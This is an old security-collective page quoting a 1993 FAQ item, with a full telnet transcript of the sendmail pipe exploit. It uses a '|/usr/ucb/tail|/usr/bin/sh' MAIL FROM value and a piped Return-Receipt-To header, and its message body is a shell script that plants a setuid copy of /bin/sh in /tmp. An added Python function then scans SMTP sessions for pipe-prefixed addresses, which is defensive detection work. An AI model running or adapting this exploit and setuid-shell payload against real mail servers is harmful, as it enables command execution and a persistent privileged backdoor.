..:-={{Collaborative Security Information Center}}=-:..
X-TREME & TECHNOTRONIC Security Collaboration Project
http://www.technotronic.com -=©=- http://www.x-treme.abyss.com

[From CSC FAQ, credit to J. Rawlinson]

---cut here
[panix!jhawk] |% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 -0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: jhawk@panix.com (John Hawkinson)
To: jhawk@panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen

Hi there. Wanna play ball?

#!/bin/sh
#The above line is just in case :-)
echo This is a Serious Bug > /tmp/bug
echo id reports: >> /tmp/bug
/usr/bin/id >> /tmp/bug
echo Fixing this would be good >> /tmp/bug
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
chmod ugo+rx /tmp/bugshell
.
250 Ok
quit
221 panix.com closing connection
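
In the session above the server answers "Sender ok" to a MAIL FROM value that begins with `|`, and the message also carries a Return-Receipt-To header of the same form. The following check is an added example, not part of the CSC FAQ text: it scans the client side of an SMTP session for such addresses. The sample session is constructed from the one above, and the function name and the list of address headers are assumptions of this example.

```python
import re

# Constructed sample: the client-side lines of the session shown above.
SAMPLE_SESSION = """\
HELO
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
RCPT TO: root
DATA
From: jhawk@panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.

Hi there.
.
QUIT
"""

# Envelope commands, with or without angle brackets around the address.
ENVELOPE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<?\s*(.*?)\s*>?\s*$", re.I)
# Headers whose value a mailer may later treat as a delivery address
# (the choice of this list is an assumption of the example).
ADDRESS_HEADERS = {"from", "sender", "reply-to", "errors-to", "return-receipt-to"}


def find_pipe_addresses(session):
    """Return (line_no, field, value) for each address that starts with '|'."""
    findings = []
    in_data = in_headers = False
    for no, line in enumerate(session.splitlines(), 1):
        if not in_data:
            m = ENVELOPE.match(line)
            if m and m.group(2).lstrip('"').startswith("|"):
                findings.append((no, m.group(1).upper(), m.group(2)))
            elif line.strip().upper() == "DATA":
                in_data = in_headers = True
            continue
        if line == ".":              # end of message, back to command state
            in_data = in_headers = False
        elif in_headers:
            if not line.strip():     # blank line closes the header block
                in_headers = False
                continue
            name, sep, value = line.partition(":")
            value = value.strip()
            if (sep and name.lower() in ADDRESS_HEADERS
                    and value.lstrip('"<').startswith("|")):
                findings.append((no, name, value))
    return findings
```

Body lines are deliberately not inspected, so a `|` inside the message text does not raise a finding.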